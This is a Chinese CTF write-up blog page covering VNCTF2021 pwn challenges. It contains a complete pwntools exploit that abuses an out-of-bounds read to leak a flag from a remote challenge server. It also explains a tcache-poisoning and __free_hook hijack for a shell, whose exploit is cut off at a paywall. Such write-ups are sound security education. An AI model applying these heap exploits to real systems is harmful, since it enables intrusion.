【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3

最新推荐文章于 2024-02-28 23:32:58 发布
VIP文章 最新推荐文章于 2024-02-28 23:32:58 发布
阅读量967 收藏 2
点赞数
分类专栏: CTF题解 文章标签: 信息安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arttnba3/article/details/115447496
版权

【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3

github blog addr there

VNCTF2021 - Pwn

太棒了,我逐渐理解一切.jpg

[VNCTF 2021]White_Give_Flag - read out of bounds

惯例的 checksec ,保护全开

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TNWJNScE-1617625416115)(https://i.loli.net/2021/04/01/nwjrFpHgQ1zJcEa.png)]

分析主函数逻辑可以发现仅提供了分配、释放、编辑堆块的功能,以及一个无用的打印随机数的功能,并不存在明显漏洞

image.png

在开头的初始化过程中会随机malloc数次并读入flag内容,其中最后一次并没有清空堆块,flag内容存在于 [0x300, 0x500] 大小的某个堆块中

image.png

在主函数中读入选项时有个 bug :返回值并非读入的数据通过atoi转成的数值,而是read() 的返回值,即读入的长度

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-r0Bi3FWF-1617625416128)(https://i.loli.net/2021/04/01/ArZkfW4yzwxiDaH.png)]

而读入选项后会打印 qword_202120数组中的字符串,我们不难想到的是:若是我们直接发送 EOF ,则 read() 会返回 0,我们即可向前越界读,这里可以使用 pwntools 库中的 shutdown_raw() 函数完成

image.png

前面刚好是储存堆块的数组,刚好可以读到第四个堆块

image.png

那么我们只需要不断尝试分配到一个存在 flag 的堆块后打印即可

构造exp如下:

from pwn import *
global p
#context.log_level = 'debug'

def cmd(command:int):
    p.recvuntil(b"choice:")
    p.sendline(command * b'a')

def new(size:int):
    cmd(0)
    p.recvuntil(b"size:")
    p.sendline(str(size).encode())

def free(index:int):
    cmd(2)
    p.recvuntil(b"index:")
    p.sendline(str(index).encode())

def edit(index:int, content):
    cmd(3)
    p.recvuntil(b"index:")
    p.sendline(str(index).encode())
    p.recvuntil(b"Content:")
    p.send(content)

def exp(hit):
    for i in range(3):
        new(0x10)
    new(0x300 + hit * 0x10)
    edit(3, 'arttnba3arttnba4')
    p.recvuntil('choice:')
    p.shutdown_raw('send')
    s = p.recv()
    log.info(s)
    if b'{' in s or b'}' in s:
        exit()

if __name__ == '__main__':
    i = 0
    count = 0
    while True:
        try:
            print('try time: ' + str(count))
            print('try: ' + str(i) + ' now')
            p = remote("node4.buuoj.cn",39123)#process('./whitegive')
            exp(i)
            p.close()
            i += 1
            i %= 0x20
            count += 1
        except Exception as e:
            log.failure('exception!')
            p.close()
            i += 1
            i %= 0x20
            count += 1

运行即可获得flag

(都要给非酋爆傻了)

[VNCTF 2021]ff - tcache poisoning + IO_FILE hijack

惯例的 checksec ,保护全开

拖入IDA进行分析

大致是有着分配、释放、打印、编辑堆块功能的程序,但是限制了只能编辑两次、打印一次,同时一次只能操作一个堆块

释放功能中没有清空,存在 UAF

但是libc 的版本为 2.32 ,那么我们需要用掉唯一的一次打印的机会泄露堆基址才能通过 double free 进行任意地址写

而我们还需要想办法泄露 libc 基址,但是我们只能分配 0x80 的堆块,即使劫持了 tcache管理器 后所释放的堆块也只能够进入fastbin中(而且我们一次只能操作一个堆块

考虑到 tcache管理器 本身便是一个 0x291的堆块,我们可以劫持之后改对应计数为7后free掉,送入 unsorted bin 中,之后切割这个大chunk,利用残留指针 大概1/16 的几率可以爆破到 stdout 附近,劫持 stdout 以泄露 libc 基址,最后改 __free_hook 为 system 函数后释放一个内容为 /bin/sh的 chunk 即可 get shell

非酋的话可能要爆破很久…

故构造exp如下:

from pwn import*
#context.log_level = 'debug'
global p
libc = ELF('./libc.so.6')#ELF('/lib/x86_64-linux-gnu/libc.so.6')#

def cmd(command:int):
    p.recvuntil(b">>")
    p.sendline(str(command).encode()
最低0.47元/天 解锁文章
arttnba3
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
堆知识--持续
Stella_Leo的博客
08-24 1855
author: moqizou 堆源码的知识总是看一点忘一点,导致堆的学习非常缓慢。这里我还是开个文章记录一下,堆源码的知识吧。 Chunk Extend and Overlapping 这是一种通过改变chunk head来达到伪造chunk大小,从而把用户区申请到相邻的chunk上去,达到溢出修改其他chunk的目的。 主要利用的ptmalloc机制如下。 寻找下一个chunk的机制(下一个指高地址) ptmalloc机制通过当前chunk指针加上当前chunk大小来获取下一个chunk的指针。.
迟到的VNCTF2024逆向题WP
最新发布
sln_1550的博客
02-28 1543
这次比赛因为有事外出,只做了前两题,最近有空才把另外3题也做出来,总体来说比以往的VNCTF逆向题目要难一些。当然也有可能是我水平退步了,就算有时间参加比赛,也做不完这5题。VN的小伙伴越来越厉害了,出的题质量还不错哦。
[VNCTF 2021]realezjvav 复现
feng的博客
03-16 1121
前言 这次VNCTF的题目还是挺难的,web唯一一道php直接把我按着锤,只会php的我居然第一时间先去复现这道java(笑) 复现 跟着ha1师傅的WP走一遍,中间自己还好没有出什么太大的问题,虽然不会java,但是也拿SpringBoot写过一点点东西,对于“大名鼎鼎”的fastjson也是有所耳闻。 进入环境,f12看一下源码,可以看到注释里写的:both username and password are right , then you can enter the next level。再根据h
VNCTF2021 misc wp
qq_49354488的博客
03-16 1155
Misc 这次比赛排名在25,还可以。 [VNCTF 2021]Check_In 签到 打开题目底下就是 vnctf{Have_a_good_time!} [VNCTF 2021]Questionnaire 问卷,做完就给 比赛时候没做这个问卷,导致排名往后掉了几名 vnctf{See_you_next_time} [VNCTF 2021]冰冰好像藏着秘密 解压出来得到一个png图片, 文件名是FFT我们搜索一下 搜到博里叶变换,我们继续搜一下博里叶变换脚本 因为之前的附件可能存在问题,并没有跑
2021VNCTF
unexpectedthing的博客
02-22 985
文章目录GameV4.0newcalc0gocalc0非预期预期InterestingPHP解法1:解法2 GameV4.0 直接base64解码 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); ap
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1448
ciscn2022-线上-半决-pwn
高版本glibc的tcache和fastbin指针加密机制
qq_51474381的博客
04-18 1550
先贴一下源码 tcache: static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); /* Mark this chunk as "in the tcache" so the test in _int_free will detect a
glibc __libc_free() 源码分析
huzai9527的博客
01-20 828
__libc_free() 检查是否存在 hook函数,如果有就执行 void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ void (*hook) (void *, const void *) = atomic_forced_read (__free_hook); if (__builtin_exp
C语言漏洞学习-堆漏洞(一)
qq_44370676的博客
07-24 1312
堆漏洞 understanding-glibc-malloc
CTF资料.rar-------
02-16
ctf入门
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
CTFtime.org-CTF-events:CTFtime.org-CTF-events KR
04-12
CTFtime.org-CTF-事件CTFtime.org-CTF-events KR
ist的matlab代码-darkarmy-ctf.github.io:darkarmy-ctf.github.io
05-26
ist的matlab代码黑暗军团 描述: Dark Army是一支由CTF组成的国际团队,只是一个具有良好安全意识的普通团队,同时也是努力工作的网络安全爱好者。...Pwn 加密货币 OSINT 旗帜! 捕捉全部! 链接:
CTF题解NO.00003】moeCTF 2020 - official write up by arttnba3
arttnba3的博客
11-20 4166
github pages blog addr 文章目录[github pages blog addr](https://archive.next.arttnba3.cn/2020/09/07/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x03%E3%80%91moeCTF2020-write-up-by-arttnb3/)0x00.绪论0x01.PwnPwn从入门到入狱WelcomeBaby Pwn - ret2textBaby Shellcode - shellcodeunusual
CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba3
arttnba3的博客
08-18 3143
CTF题解NO.00001】西安电子科技大学网络与信息安全学院2020年网络空间安全专业实验班选拔考试 - write up by arttnba30x00.绪论0x01.PWN (AK)cmcc_stackpwn_canary0x02.reverseBabyre0x03.mischelloencrypt 0x00.绪论 最近这几天网络与信息安全学院搞网络空间安全专业的实验班考试,作为蒟蒻的我抱着试一试的心态混入了考试的大佬之中XDD 说不定再过几天我就从计科院人变成网信院人le 0x01.PWN (
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1240
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值